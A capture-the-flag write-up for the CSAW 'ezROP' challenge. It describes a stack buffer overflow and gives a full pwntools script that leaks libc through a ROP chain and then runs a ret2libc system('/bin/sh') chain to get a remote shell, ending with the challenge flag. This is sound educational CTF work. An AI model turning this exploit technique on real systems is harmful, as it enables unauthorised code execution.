0x0 Introduction This is a simple buffer overflow challenge, but I wrote it in a reversed way :)
nc pwn.chal.csaw.io 5002
Files: share.zip
0x1 Mitigation 1 2 3 4 5 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
0x2 Vulnerability We have a 0x9c byte buffer overflow in vuln()
.
With no PIE and noe canary, we have direct control to RIP.
Therefore, make a ROP chain to leak libc address, then perform a ret2libc to get a shell.
0x3 Exploit 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 from pwn import *exe = ELF("ezROP" ) exe_rop = ROP(exe) libc = ELF("libc6_2.31-0ubuntu9.9_amd64.so" ) context.binary = exe def log_print (*msg ): log.info(" " .join(map (str ,msg))) lp = log_print def start (): if args.LOCAL: r = process([exe.path]) if args.R2: input ("Wait r2 attach" ) else : r = remote("pwn.chal.csaw.io" , 5002 ) return r ret_addr = exe_rop.find_gadget(['ret' ])[0 ] pop_rdi_ret_addr = 0x00000000004015a3 pop_rsi_r14_ret_addr = 0x00000000004015a1 io = start() io.sendafter(b"name?\n" ,flat({ 0 : b'\n' , 8 : b'AAAAAAAA' , 0x70 +0x8 : [ ret_addr, pop_rdi_ret_addr, exe.got["printf" ], exe.plt["printf" ], ret_addr, exe.sym["main" ] ] })) io.recvuntil(b"22!\n" ) libc.address = int .from_bytes(io.recvuntil(b"My" ,drop=True ),"little" ) - libc.sym["printf" ] print (hex (libc.address))io.sendafter(b"name?\n" ,flat({ 0 : b'\n' , 8 : b'AAAAAAAA' , 0x70 +0x8 : [ ret_addr, pop_rdi_ret_addr, next (libc.search(b"/bin/sh" )), libc.sym["system" ], ] })) io.interactive()
0x4 Flag flag{53bb4218b851affb894fad151652dc333a024990454a0ee32921509a33ebbeb4}